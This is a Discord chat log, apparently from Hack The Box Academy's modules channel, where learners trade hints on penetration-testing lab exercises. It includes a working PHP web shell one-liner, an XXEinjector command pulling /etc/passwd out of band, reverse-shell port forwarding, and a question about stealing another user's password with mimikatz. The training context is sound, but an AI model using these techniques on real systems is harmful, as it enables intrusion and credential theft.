#modules

Is there no options for rport?

Usually you set the ip in rhost and port in rport

maybe try SET RHOSTS xx.xx.xx.xx

without the port

You need to set the port separately in msfconsole

ah, yeah, I just tried it after seeing this and rport worked. thanks yall

Outplayed the community contributor

You’re welcome 👍🏼

I have a life so I'm just chiming in when I can

You don’t, otherwise you wouldn’t have that role

https://tenor.com/view/glasses-sunglasses-cool-tom-cruise-smile-gif-17437889

Work smarter not harder my guy

15.56% Completed on the module so far.

Im doing the API attacks module and I'm on the question where you upload a php backdoor and then are meant to find the hostname of the target. I tried to use the script provided by the author to create a web shell. It seems to work but it prints an empty line every time I write a command.

Can't even find a writeup for this module so I really do need your help.

Yeah so I shouldn't've followed the module. Tried this much simpler web shell: <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> and it worked out. Don't see why they had to overcomplicate things so much.

need help on module Attacking Enterprise Networks: Web Enumeration & Exploitation
Question 1: Use the IDOR vulnerability to find a flag. Submit the flag value as your answer (flag format: HTB{}).

i tried to login as admin but idk what should i do, i tried to brute force but it fail any hint plz

https://academy.hackthebox.com/module/163/section/1544

hey friends, any help with Linux Local Privilege Escalation - Skills Assessment flag 4, i am at user ||barry ||and cant find any pass for ||tomcat||, i searched all the logs, hiddin files and conf but found nothing, any help please

first if the shell work what's the issue also writeup and walkthrough is only allowed for tier 0 module

The web shell that was in the module didn't work. After messing around with my own shells I found something that worked.

i don't have the username for that flag in my note for some reason but if you got a shell from tomcat then the flag should be in ||/var|| and a quick find or grep should get you the flag

i know where is the flag, i got the username ||tomcatadm ||but no password

oh that part, hint bottom of one of the page

Hi, anyone for this question please?

any good machines to practice LFI?

omg finally, thank you so much

If you are still having trouble try using remote desktop connection

it took my 2days for manual brute force 5times and the machine block my ip and i got nothing... LOL

Well, the system has a contour-to devouir the sentenced a correct way

any hint how to escalate priv in : Windows Privilege Escalation Skills Assessment - Part I ?
https://academy.hackthebox.com/module/67/section/637

het friends, i am at Linux Local Privilege Escalation - Skills Assessment trying to get full interactive shell but i cant click "enter" after the "stty row echo" command, anyone know a way to fix that?

i think this may be a zsh thing, try doing both of these commands on one line instead; stty raw -echo;fg

thank you so much, it worked 😊

it works now

You managed to do it from your local vm as well?

@novel shoal now are you need help?

I'm on the Attacking Common Applications module attacking ColdFusion section. I've gained a reverse shell but struggling to find what user ColdFusion is running as. I've tried whoami and checked C:\Users but none of these are the correct answer. I've then tried tasklist and netstat to try and find what's running and under what user but still can't see anything. Also gone through ColdFusion documentation and config files. Has anyone completed this section that can share how they found the answer? (Feel like I'm missing something obvious)

Would appreciate an assist on File Uploads - Skill Assessment. Read the source code, found the file upload path and rename, verified server response for date/time but still getting a 404 when verifying with a legitimate .jpg file

nevermind, I got it figured out

Hello, can I dm you pls ? Machine is buggy af.. can't do anything ^^

ok

make sure there are no spaces when submitting the answer

I need a hint with kerberos attacks - skills assessment

On the shells & payloads The Live Engagment question #1, will netcat work for a listener or do I have to use metasploit? Neither have been working at this piont. I am using the rdp ifconfig ip 10.#.#.# for LHOST and the 172.#.#.# for RHOSTS.

it's up to you both of them are going to work. I personally used nc

thanks. just need a confirmation. I'll keep at it. I'm just not getting the right piece of the puzzle to fit yet.

hi guys i encountered a strange error while trying to rdp into a target machine

i am at the Pass the Ticket (PtT) from Windows section in the Password Attacks module

RDP to 10.129.230.199 with user "Administrator" and password "AnotherC0mpl3xP4$$"

thats what i am trying to do

but i get this error

https://i.imgur.com/aHW7cQq.png

can anyone help pls?

hello can I get points in htb without paying for vip?

Yes, you can do the active machines and challenges

ok thank you.

Hi guys, can anyone help me with my CPTS module, im stuck i dont know what to do

i verified me user

sure someone is going to help, but please write which module you are having problem with

Exploiting Web Vulnerabilities in Thick-Client Applications

can somebody help , Windows Privilege Escalation Skills Assessment - Part I , 2 question (Find the password for the ldapadmin account somewhere on the system.) , Im on system, how to escalate privilages any tips ?

hey guys I'm in the "Attacking Common Services - Hard" in the last Q, (find Administrator Desktop)
but I don't get it ...
I found ||testadmin|| but I'm not sure what 2 do next,
can some 1 please help me...

this should help:
#modules message

sure i can help

#modules Exploiting Web Vulnerabilities in Thick-Client Applications

I need help with the last question of the skills assessment in kerberos attacks

next hint would be ||linked remote database||

Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches) === sudo tcpdump -r /tmp/capture.pcap -X . What is wrong with this ?

-Xr

iirc

you didnt use best practices

there are several ways to achieve what the question states but only one using “best practices”

Hi! Did you finish this module? Have same trouble with this question, any hints please? 🙂

Thank you very much

hello everyone

Hey yall, im stuck on the first question of the Windows Event Logs & Finding Evil module. I found the log and filtered for the logon id: 0x3e7 but I am completely lost. Im not sure if I am supposed to narrow down the search more and what I would filter for, can anyone push me in the right direction?

What section

First section, first question

Have you filtered for event 4624 and went to the time mentioned?

Idk why you’re using the xml query to filter for logon id 0x3e7

Yeah I found the log, but Im not sure what to do afterwards

Hi I am on this nmap module doing the intermediate nmap IPS/IDS evasion section. I am supposed to get target's dns server version. I am able to get DNS port 53 to show as open but when I google it using built in scripts for dns server version is not working.

for other people it works but for this challenge it doesn't

I have tried playing around with nmap controls as well

can someone help me out?

Ah yes I remember. Don’t filter for 4624, filter for 4907. Like the section says “Delving into the log details progressively reveals a narrative. For instance, the analysis begins with Event ID 4907, which signifies an audit policy change.”

└──╼ [★]$ sudo nmap -p53  10.129.85.38 --script=dns-recursion
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-24 23:40 BST
Nmap scan report for 10.129.85.38
Host is up (0.0035s latency).

PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
┌─[us-academy-1]─[10.10.15.105]─[htb-ac-605555@htb-eh0iaboljx]─[~]
└──╼ [★]$ sudo nmap -p53  10.129.85.38 --script=dns-service-discovery
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-24 23:41 BST
Nmap scan report for 10.129.85.38
Host is up (0.0035s latency).

PORT   STATE    SERVICE
53/tcp filtered domain

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds

can someone help me out? I have done a bunch of scans I also have tried -sS, -A, -V, etc

I got it, thank you so much

not doing anything to get DNS server version

You’re welcome

Don't forget UDP scanning

is there any discount codes for VIP+ before i buy it?

if anyone knows

Yeah #welcome

and make sure to read rules.

did not know about verification and that just opened up alot more discord channels lol

ive been in here for awhile just never verified oop

ty pwning

yes there is they gave discount codes as prizes for the hackers clash ctf competition

If you want you can have mine its actually useless for me because you can only use it when buying or renweing your subsription and mine wont be up for renewal well past the expiration date for the discount code

dm me if you want it

why does the ftp> get flag.txt
come back permission denied?

Anyone here who has completed the DACL I Skills Assessment and can help me with Question 3?

screw it gonna release publicly first one uses it get it discount codes for htb subscription and the gift shop

Iwant to ask about if I start a module when I'm using student subscription

and the subscription ends

darn already gotten

I still have the possibility to continue on this modules ?

dang that was quick

said invalid for me

sure you entered it correctly? also its only valid for yearly subscriptions and not the monthly

OHHHHHHHHHH

can someone tell me if i start a module i will have the ability to go in forever

yes once you have a module its yours forever

because I have student subscription that give the ability to use tier 0 1 2

so I have just to start them and after the end of the subscription I will still ave them

I've read you have to complete it or buy it with cubes to have it forever. So if you're on student and the module is at 99% and the subscription ends, you'll have to unlock it again either with sub or cubes

@wheat garden do you know why this is happening?

might not have permission to access the directory or file

if you need more detailed help direct message me and explain to me what your doing / working on

If you're on a student sub all you have to do is complete it

Like 8bit said

Why there is no logo for some of the new badges?

I just tried that and it didn't work

I'm trying to get the version of DNS so maybe there's something other than nmap involved?

If you are still stuck pet me know

nevermind I found the flag

i'am uploading to the web root folder C:/xampp/htdoc/webshell.php, but when i browse for http://x.x.x.x/webshell.php server show 404. thanks for u help 🙂 maybe I'am uploading the wrong php code?

na i got it, i forgot to poke it to activate/force change. cheers tho

Just completed the Modern Web Exploitation Techniques, if someone needs help, just dm me

Try doing the webshell upload command twice and see what the output is

@fathom pendant The ouput at the second time says " File 'C:xamppdocswebshell.php' already existe" . is the server renamed My upload?

Check the messages that keep showing up in responder and read them closely.

is there a ticketing system, can't seem to verify

Switch backslash directions

guys i dont see the bubble for the support team in the academy site... need to get hold of them as everyday I have to attempt several times trying to rdp before I go through by luck

adblock, or click the ? mark.

tried without adblock and its still the same no help bubble and the help center just shows me where the bubble is. never mind it just popped now

does anyone remember which password list they used for the Attacking Common Services - Medium Lab?|| I've tried pws.list from the module resources, password.list from an earlier section, and rockyou.txt|| ||all on the uncommon port.||

what are you trying to crack

ftp

consider password mutations with custom.rule or try another service

I forgot about that ty

np

im giving it a whirl

😭

no go

try another service

did you already get something from the FTP server? Feels like you are trying to brute-force the services without giving a proper enumeration first, however I may be wrong on this (but since you are asking for wordlists to use...)

no I didn't get anything so I am bruteforcing with a user and pass list. I tried smtp-enum-user on the other ports but nothing

Then you need to step back and re-enumerate everything

I didnt see any username anywhere

true

alright

try to see if there are other ports open

yeah there are 5 more open ports

I usually try with those who might not need credentials first

why are you still with ftp🤣

Is it on my end that I get this error? I reset the target a few times, waited at least 5 minutes and scanned, both of the FTP ports show open but I get this error. I tried anonymous

lol

maybe anoymous access isn't allowed on this ftp server

but they dont even give me the option to login?

I tried a random username

what command did you use to login

ftp random@10.129.210.191:2121

ftp [[USER@]HOST [PORT]]

that lab is weird just restart and wait 5-10 minutes

😭 i will keep doing it

all i can tell is that its not a common port

u have to discover open ports then sCV on them

I see the uncommon one and tried, I will continue to reset and wait

oh mb

i thought u were on password attacks module

reset the target until you get 6 open ports

I did, they are both open and then I try and I get that error unfortunately

nah

still the wrong port

yea 2121 is rabbit hole xD

I have the ||30021||

there u go

but I get that error

wat

I am waiting 10 minutes again

try again with ftp <ip> <port>

I did, it must be the machine

or me

can you run it and paste the screenshot?

yeah

try passive mode

with -p

I am still waiting but I did this a few minutes ago before the reset

why you using wrong command

without username

learn the syntax

use this

without colon

ftp IP PORT

as easy as that

you dont need a colon?? omg

no

you need to learn how to google basic stuff

I feel I've done it with a colon before

in SSH

or HTTP

lol

🤣

also dont u see the response

:21 :ftp :?

thats telling you it’s ignoring the part where you tell “30021”

which means wrong syntax and your brain has to immediately think “whats the proper syntax then?”

Everything including the command is well explained in the module and all of the above was a bit of a spoiler

its w.e. our guy was losing his mind

we saved 1 human

I got the flag, I am sorry about all that. Thank you for all for helping

I should probably sleep

just have to pay attention to the output and do some research on the command syntax

will do

👍

no reasons to be sorry

all of us have been in your shoes

work smarter not harder, resting is something smart to do

yes, that how I found ||"testadmin"||, but I don't uderstand how 2 continue with that...

command execution

U mean ||xp_cmdshell||?
cause I don't have permissions ...

which user are you logged in as rn

john

have you checked the permissions for john?

it's 0

thats on the original server

have you checked his permissions on the linked server ？

trying 2 figure that out

can I DM u?

sure

#careers-and-certs

Thanks.... i didnt notice this thread. i will remove my question and move it there.

Hi

Anyone doing the Linux Training module?

you can ask your questions here

Thanks

I'm trying to go past a section in the training where I have to list all the services listening on all interfaces on the OS, not just ipv4 and eth.

Haven't been able to get the right number.

I want to understand how interfaces work though, and how services come to listen on one or more interfaces

Got any pointers

?

this one time i zero dayed a windows app and i submitted a bug report and i was drunk and windows said it wasnt enough and i just didnt give a care enough to submit a proper bug report

oh wait wrong chat sorry

https://tenor.com/view/doubt-press-x-la-noire-meme-x-button-gif-19259237

id doubt me too being a drunk idiot

help me with module 1 tho

Could someone assist me with the Broken Authentication skills assessment? I managed to discover a valid username and password, decoded the cookie, and created an admin one. However, I'm consistently encountering a message stating something like 'user cannot change role.' I really need to complete this assessment, HELP!

@fair hornetplease give two channels. one for general noobs, like me, who refuse to make an actual HTB account. and another for suggestions, where this would be a more appropriate suggestion and not require a ping.

thank.

so stop trying to change your role

that could work

idk if i got it. I need change my role to gain admin acess and get the flag.

you might think that but you might be thinking wrong. i also dont know anything of what we are talking about though

??????? why are you saying anything then? LOL You did not ended the Broken Authentication module?

you dont need to change your role. you need to change the role of the query being made against the target

AH

no. i dont play games like htb

LOL

😐

did you ever got that one ? seems i'm stuck in the same place 😐

Why are you here then?

cus its not a game noob

Help guys

its real life

behave @rustic sage

and read the #rules

Look into the “book” box from HTB, ippsec and xct have vids on it. Logrotten is used there

you have to be more specific

for the love of god give us a noob channel why did i default into modules

you can ask your questions here

sorry

Just make an account if you want access to all of the server.

i need to change my pfp to a chili pepper

no. please. dont make me.

its a hard please ill beg for it.

How can I list all the services listening on network interfaces on my linux distro. Network interfaces including ipv4 and eth

check out the man page of the command ss

thanks

Or netstat I guess?

that could work

Thanks.

I do ss -l which lists a bunch of sockets on all protocols, but when i take the count using ss -l | wc -wcl the line count is 200 total and the academy module rejects it

AITA?

hi beautiful folks

Welcome G

hi beautiful folks,
i am extremely new into cyber security and IT i am doing this module Introduction to network analysis and i am stuck into few questions ( yes i did try many times ) kindly i would highly appreciate if u guys could help me please. thank you in advance.
Q1) If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.

Q2)Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)

Q3)What TCPDump switch will allow us to pipe the contents of a pcap file out to another function such as ‘grep’?

Q4)How do you start a capture with TCPDump to capture on eth0?

much appreciated 🙂

@oak sapphire do you need to do it on your own host or on the target host?

that's for TCPDUMP

What have you tried? As it seems all of those questions can be answered by checking the manual of tcpdump

On the target host. I'm SSH'd in using powershell

What module is this?

i did but when i put the answer it keep saying wrong answer

Lol get ChatGPT or something. Try there first

what have you tried

Linux fundamentals p12

for ist q i put--> -nnvXc 100

Linux fundamentals and you need to ssh to a target with power shell?

for 2nd q i put -X

You have to have a VPN client with their profile too or you wont have access to their networks.

right now i'm obsessed with finding answers.

try ||-n -vXc 100||

thank u but again got incorrect answer

try ||-nvXc 100||

great, got the right answer, thank u Plut0

You were only 1 letter off lol

i think i'm interpreting the question wrong.

" How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)"

How else to interprete @analog dock

¯_(ツ)_/¯

Did the section speak about nmap?

thank u guys, pluto do u mind helping me with other questions plz ( only if u have time, thank u )

And otherwise you can ssh to it and run netstat -tulpen

no we're not in nmap territory yet.

Should show the listening services

sure

I'll try again, but i already tried once before. count was off.

Q2)Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches)

Q3)What TCPDump switch will allow us to pipe the contents of a pcap file out to another function such as ‘grep’?

Q4)How do you start a capture with TCPDump to capture on eth0?

much appreciated 🙂

Linux fundamentals - network services?

I’ll unlock the module and check

Woah that'd be great

you can use the r and X switch for that

What section

dont forget best practices

Workflow. P12

i did -rX but came up as wrong answer

Xr

incorrect

-r?

it would be just to read the file but won't show in ascii n hexa

you can use the ||XX|| switch for both hex and ascii

i think

unfortunately no joy 😦

||-XXr|| ?

incorrect

@oak sapphire I got the answer

haha no way!

https://academy.hackthebox.com/module/81/section/774

I suspect this has something to do with wc

and not counting properly

The question asks for the services “listening”, it can NOT be on localhost, so only the 0.0.0.0 addresses, and only the ipv4 addresses, no 127.0.0.1, so only the tcp ones, not tcp6

is this kind of sorting available as options to ss? or netstat?

or using post-cat tools?

You can find it with netstat -tulpen

I di that and got a bunch of services total 200. which was wrong

You did it incorrectly

oh okay.

so tell me why the services on local and tcp6 are considered to not be "listening"

I’m not saying they aren’t listening, it’s what the question states

thats what the question said

ah... please explain.

cos you said "listen", and it shows some services on tcp6 to be in state "listen"

So?

The question literally states ipv4 only

Tcp6 is ipv6

haha but it said "not on localhost or IPv4 only"

No

hmm

That’s not what it says

hello

It says not on localhost AND ipv4 only

lol i see "and" on my end.

Because it is and

It’s not or

This is my first time playing discord. Can someone give me some Pointers?

oh, so, I'm supposed to list
condition 1: not localhost.
condition 2: ipv4 only?

And condition 3, it must be listening

yeah, keep WASD handy. and don't use cheats till like level 99

ah great'

Need to work on my comprehension kills

Well discord is not really a game, how did you find this server, and what are you looking for?

@oak sapphire if you grep listen, grep -v tcp6 and grep -v 127.*, you’ll find the answer

I'm studying at HTB Academy and want to ask some questions about file upload vulnerabilities

ask

My English is not good, so I may not express it accurately. I used a translation software

okay

https://academy.hackthebox.com/module/136/section/1288
I'm doing this exercise. My question is that why is there no file path in the upload file request

Sorry, I can't send a screenshot

To send a screenshot you have to make an acc on the main platform, and verify in #welcome

thks

in this module https://academy.hackthebox.com/module/162/section/1572,I finish all,but for the last question I can't find the user svc_reporting in which group

I recommend sending the module and section name. Not the link

OK，in this module Documentation & Reporting Practice Lab

@analog dock I do grep -v -e "ipv6" -e "127." | wc -wcl and theres a couple udp services included, but they're not "listen" state

Did you grep “listen” ?

Thanks.
This worked.

netstat -tulpen | grep -v -e "tcp6" -e "127." | grep "LISTEN" | wc -l

👍🏼

logrotten question , how to rotate the access log to get shell, any tip? I have run ./logrotten -p payloadfile access.log

Hey, I am in the Blind Data Exfiltration module. I am using the following command "ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/etc/passwd --oob=http --phpfilter" and getting a "FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive. Wait or Next? W/n" as response. What should I do?

Id look at the HTB box “book”, ippsec has a walkthrough online which has the logrotten exploit

so who can help me this question

the last question

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771865(v=ws.11)

ok,thanks,let me see it

thanks my brother.

No problem, however the command has been used multiple times across the learning path material so looking back at some modules or the cheat-sheets it is definitely a good idea

yeah you're right

hi

Can someone help, please? This is the only one lefting to complete the entiry module.

curl on my pwnbox is not working

i can ping google.com, but it times out in the adressbar

free pwnbox doesn't have full access to the internet

which module are you on? i assumed that's the section name

Yes, sorry. It is in Web Attacks

Hey guys, has anyone run into this before? a quick google search indicates it's not a common error but maybe someone here knows more 🙂

that look familiar also next time pls add which section and module are you on but if you download that tool from the creator github then there is a code bug some where in that original file and there should be a copy of that tool (that work) under C:\tools or something

There's a fix for this in the tools GitHub Issues listing.

thank you very much guys 🙂 I'll check that out

I would like some help. I cannot understand what the author is trying to explain.
https://academy.hackthebox.com/module/112/section/1067

what part do you not understand?

I did not understand the example they used.

it provides information about the smb server, hosts connected, username and groups

from an adminstrative perspective of course

smbtatus has to be used from local machine while being connected to samba server at the same time?

smbstatus is used on machines where the server is up and running

Oh, so that means it'll run on target machine.

yes

Gotcha. Thank you!

Hi everyone!

I have a question regarding the module "Broken Authentication" - "Brute Forcing Passwords":

After 5 attempts it I get a timelimit, so I can't brute force it with ffuf e.g.

It doesn't teach you in the module what to do in this situation

Does this exercise really want me to wait after every 5 attempts? I can't imagine that's the goal of it, or?

you can try ways of getting round it from the weak brute-force protections section

i havent done it but id assume you could spoof ip and change it or try a different username every x attempts

Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

---
I’ve managed to dump the NTLM hash from the bross user, but according to HTB it is incorrect. Gotten it w/ secretsdump, can anyone check if I’m missing something obvious?

feel free to DM

can you paste the first/last two chars of the NTLM hash?

first 3 chars are “aad…”, last 3 are “…4c7”

it is correct however you need only the second part separated by the column ":" the NT part

oh my god

alright thanks, i was going crazy

We did it 😄

now I am gonna eat lol

almost 20 hours doing that machine lol

😂

and I could do it now in 20 minutes lol

just an average day of doing Kerberos stuff

now I can do the weekly machine lol

Question #2 on Shells & Payloads Live Engagement was a tricky one. I finally figured it out though. LHOST is probably not what you think it is. Wiping forehead it only took me 2 days. Trial & Error.. On to next question.

Kerberos Attacks: Constrained Delegation Overview & Attacking from Windows
Don't they mean DMZ01 instead of SQL01?

heloo guys i created a revrse shell to do a reverse port forward ssh -R internalpivotip:port:0.0.0.0:4444 ubuntu@targetip but i cannot connect back to the reverse shell any help

hi

So, you're getting a hit back to your listener when you execute the payload but you're not getting the shell right?

Can you show me your metasploit handler options.

can someone explain a bit more to me about fetch post request? a bit confused on this one. im more concrete with post and put get curl requests, but this fetch one im a bit lost on

excatly

Double check the payload on your listener. Make sure it's the same payload for the exploit you created.

thx

XDDDDD

this is a common issue for this section

im stupid need to waer glasses

the meterpter shell is way too big for that amounts of hop (include your vpn) try with a lighter shell like a nc shell or a metasploit tcp shell

thanks 🙂 got it now

any staff around to help with a qq on 'Attacking Web Applications with Ffuf'

One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

@lean condor could you solve your issue with the lab?

I curl the page says 'You don't have access!' cant figure out what im doing wrong with entering the URL

is the exam free after i end the all the pentester modules?

you need a voucher I think

hahahaha nice question....

yup, need a voucher

just asking

but it's pretty affordable

why]

?

why, what?

nt

'<div class='center'><p>You don't have access!</p></div>' lol but i put the url with and without port

with domain and with ip

complete all the module is a prerequisite to buy the voucher

REDACTED.academy.htb:[port]/REDACTED

http://[REDACTED].academy.htb:PORT/[REDACTED]/[REDACTED].[REDACTED] shows as my old answer. so it actually says PORT instead of a number

and that was it

HAHAHA

wish it would have been obvious hahah feel like it should have been and I just missed it

Good stuff 💪🏼

no, i get stuck after uploading the webshell, server send 404. i'am using a one liner btw.

I'm stuck on Exploiting Web Vulnerabilities in Thick-Client Applications after you change the currentFolder

ClientGuiTest.this.currentFolder = "configs"; 
to
ClientGuiTest.this.currentFolder = "..";

When I try to recompile the JAR I get 31 errors like this one

fatty-client.jar.src\htb\fatty\client\gui\ClientGuiTest.java:397: error: cannot find symbol
/* 397 */             } catch (MessageBuildException|htb.fatty.shared.message.MessageParseException e1) {
                               ^

I found the walkthrough for HTB Fatty by 0xdf (https://0xdf.gitlab.io/2020/08/08/jar-files-analysis-and-modifications.html#modifying-compiled-classes), and I have tried to follow along with that and the section but I haven't been able to make any progress with these compiling errors. Any help would be appreciated.

@tender lake there is a guy that did a nice writeup on the academy forum on the module

One of the comments there

Do have the thread name on hand?

Sorry no but just write the name thick cloent applications and there is a large wall of text blurred out

alls good, I'll find it.

Found the comment. Thanks @devout torrent

hi guys, 1 qn.

if there's a user beside me logged into the same host. (hes using console), how can i grab his plaintext password? using mimikatz?

which module is this

can you please provide more information?

gj

Hi, I'm doing the login brute forcing module assessment. How long is reasonable to wait for Hydra before giving up? It says it's going to take 30 hours to go through the custom wordlist I made.

Hello guys, i'm on the module footprinting hard lab, im in the mailbox but i dont know the command to see the entire mail, like i can only see subject and header but not the content, i searched some ressources on the net but i cant found anything... Do you guys have some ressources ? ty

checkout https://donsutherland.org/crib/imap

Thank you !

that module is more about learning patience😅 it's been a while since i've done this module so i don't remember the exact time, but i don't think i ever waited over an hour

Ah, making the wordlist simpler sorted it. It turns out when using cupp I had gone overboard in including trivia about a certain fictional character 😆

I guess the lesson is keep it simple and look for low hanging fruit first

why are you the way you are

bro can you explain me what I'm server for

why did you join this server if you didn't know already

#modules message

This is also useful

https://www.atmail.com/blog/imap-commands/

That’s what I use

I linked that earlier

Ok

Link was so far back it took too long for me to load

🤷🏼‍♂️

Alright I am having trouble on a question due to not doing it for awhile. I cracked the password for Kira awhile ago. Of course, this is why documentation is so important, but I have forgotten, and I have attempted to crack it again to no avail. Any help?

I am in the protected files section

what module, what section

time to go back and redo it

I did many times. ran the mutated list, ran fasttrack, rockyou, etc.

Password cracking: Protected Files

I have access to Sams

I believe it gives a hint to the password. Mutate that one with the .rule file and you should be able to get it if I remember correctly

That gives you sams. It assumes that I already have Kiras

on "Attacking common services RDP" I think I need to do a pass the hash connection with the rdp client but I don't know how to get the hash for the other user, can I get a hint?

There's another module section for kiras password

It has a hint for it

nvm, there is a hash in plain text on the users desktop 💀

hmm

mysql maybe

I dont recall off the top of my head which section references her password in the hint

It's just one of the first ones

ok let me look

Anyone available that for module Footprinting - LAB Medium, I am on the right track? I seem to hit a brick wall 😦

Ah yes

I remember

Thanks Marcie

sure, what have you been trying so far?

I am up to the point to try to login to MSSQL using SQL Studio. But the creds (sa) I have dont seem to work. No matter what I do.

What other user could (sa) be?

Check C:\Users

hmm.

And apply critical thinking

Thx for the hint. I have something to work with now.

Don't reply and ask here

Just try and fail/succeed

:D

Many many thx

Ofc

My first steps when I access a box is check C:\users or /home/

To see what potential user accounts exist

Did that. But was staring blind on the sa acct.

Yeah just always apply critical thinking

Pffff hehe.......getting somewhere now

can anyone check if ZAP HUD from zaproxy is working on his side?

Again thanks for the push in the right direction

i think it isnt my problem coz it is happening on pwnbox

zap hud is always like a 50/50 for me, I dont bother with it

HAHAHA then cool

i will stick to burp

like every web tester ever does

good choice

if i need something else i will just script it with Python

long life to requests library

@fathom pendant The solution is right there , thank u 😁

nope, and read #welcome and verify

Yeah. I basically did the same troubleshooting when I did it

second lab was 🙃

hi

Is anyone here?

What's up

https://dontasktoask.com

https://academy.hackthebox.com/module/136/section/1288
I'm doing this exercise. My question is that why is there no file path in the upload file request

Ofc there's a request, you are just intercepting the wrong one

If I remember well it was a green button

How do I send a screenshot from here? Send a screenshot to make it clear

Idk

verify your account with instructions in #welcome

Just follow the steps (u need to subscribe in the main platform)

Do I have to subscribe to verify? Is it not possible to just register with HTB?

Please read #welcome and let's keep this channel on topic please

If you need help, we have #1024429874246590575

thks

nudge for AD Enumeration & Attacks - Skills Assessment Part II - Q10

hint go back to one of the ||"Poisoning"|| section

your command is right, maybe try on the pwnbox

Good idea, thanks. I did also try it on a different computer running Linux but pwnbox is worth an attempt

Can i dm you, I've been staring at inveigh for almost an hour now

sure but i've to go in 5 so let make this quick

Hi all. I am in the Pivoting, Tunneling, and Port Forwarding module, Portfowarding with Windows Netsh and I can't run Netsh. I get "This app can't run on your PC".

nevermind

I had to open netsh.exe separately and run the command from there.

Hello everyone im trying to run juicy potato on a machine but i have a error someone know what is this?

Testing {2C256447-3F0D-4CBB-9D12-575BB20CDA0A} 1234
COM -> recv failed with error: 10038
PS C:\tools> 

What section of a module is this? Anyway, you can try to use different CLSID to see if you get around the problem

Im in windows privesc module skill assessment, i try 4-5 diferent CLSID and no one works for me

I apologise in advance for the noob question. I have just started the "ACTIVE DIRECTORY ENUMERATION & ATTACKS" module Theoretically, I should use this command to rdp to host ea-attack01: xfreerdp /v:<MS01 target IP> /u:htb-student /p:Academy_student_AD!

However, even if I go up to vpn or try to connect from the htb instance, I get the following error: [09:23:27:215] [2697:2698] [ERROR][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex ERRCONNECT_DNS_NAME_NOT_FOUND [0x00020005]

Why is the following address not resolving? Any guesses?

Can anyone Help on this , Intro to Python 3 , Conditional Statements and Loops , Question is , In "Code block 2" the blank should be filled with what, to output all numbers in a terminal? , Ive tried EVERYTHING ??????

what did you try?

Tuple , elements, objects ,Groceries , Food , Variables

Strings

you need to literally write the piece of code you need to use in order to print all the numbers in the terminal output

Thanks Will Try

Wrap the password in quotes just to be safe, not the solution for that error tho.
If you're to RDP to ea-attack01, why would you use the MS01 IP to rdp into.
If you don't mind, can you give more context?

Also, mention the section on which you're facing this issue. People have notes and can quickly help you next time.

Sorry for the typo. I tried the following command: xfreerdp /v:ea-attack01 /u:htb-student /p:Academy_student_AD!

Also:

ssh htb-student@ea-attack01

And the following module:
Active Directory Enumeration & Attacks

Subsection below:
Initial Enumeration of the Domain

Initial Initialization of Enumeration of Enumeration, and within this paragraph:
Start Wireshark on ea-attack01

The machine you're trying to rdp from doesn't know what to resolve ea-attack01 to probably. If you have the ip address, you should mention the IP address directly or add the ip and hostname to your /etc/hosts file

How can I find out the ip in this case? Unfortunately I didn't see it in the description :/

The "ea-attack01" machine is the one you land on after you get to log in via SSH

but I can't ssh because I don't know the ip and it doesn't resolve to the hostname

did you start the machine?

I only saw the option to start the workstation :/

ooooooooo, sorry for the noob question. I see it now

thx

RETBleed attack <---- anyone familiar with

Is the nessus scanner that I will need for this lab already installed on the VM ? https://academy.hackthebox.com/module/108/section/1233

ssh b.gates@94.237.59.185
b.gates@94.237.59.185: Permission denied (publickey).

How to solve the permission denied problem?

Module: LOGIN BRUTE FORCING

I'm pretty sure that the target comes with a port

Meaning that SSH does not work on the default one (22)

Silly me, thanks!

If I remember correctly, the scanner was installed

Hello all, I'm doing the Active Directory Enumeration & Attacks module and the network is behaving different than in the walkthrough

I wasn't able to capture any host requests / mdns traffic via wireshark, and the pingsweep via fping is showing 3 hosts alive, not 9 like in the walkthrough

Any input appreciated, I'm 99% positive I'm not doing anything wrong (copy pasted the commands from the lecture)

Yes, I've let the environment boot up fully before scanning, rescanned multiple times

Provide the section as well

https://academy.hackthebox.com/module/143/section/1265

fping -asgq 172.16.5.0/23

i ran different commands and it's the same thing (diff tools)

What is incorrect about it?

Enumerate the 3 active hosts

In the walkthrough, there's 9 hosts alive. I was under the impression the behavior of the environtment in the walkthrough is meant to be 1:1 with what I'm getting

That's what has me confused, the scan itself works fine if there's actaully 3 hosts alive, not 9

Afaik it isn’t necessarily 1:1. I do know that the ones you have active, are the ones you need for the questions

Very good to know, thanks

You’re welcome

@everyone

<@&861185840277487616>

wow very serious

Rate the amount of knowledge you gained from this module. Rate outta 10. 🙂

how to handle this: Error
There are no available instances. Please try again later.

Got that already for hours, cannot do my assignments.

Hey guys is it possible to retrieve the bloodhound output from the HTB Machine used through RDP to my kali machine ?

there are many ways to get the zipped file from the victim box to your attack box. there is all whole module teaching you how to download and upload

I am gettin nowhere with the hard lab of module Footprinting. Anyone able to give me a nudge/hint?

you can dm to avoid spoilers.

What have you tried

And what are you stuck on?

I got a hint already. Of course I forgot a recon/enum step.

Alright!👍🏼

I'm currently working file upload module in CPTS. Stuck on the https://academy.hackthebox.com/module/136/section/1290 type filters sections

So far, Tried with double extension too

Hello! I got stuck at Footprinting module medium lab. The sa usernam pw that i found on the server not working with the sql server login. Did i missed something?

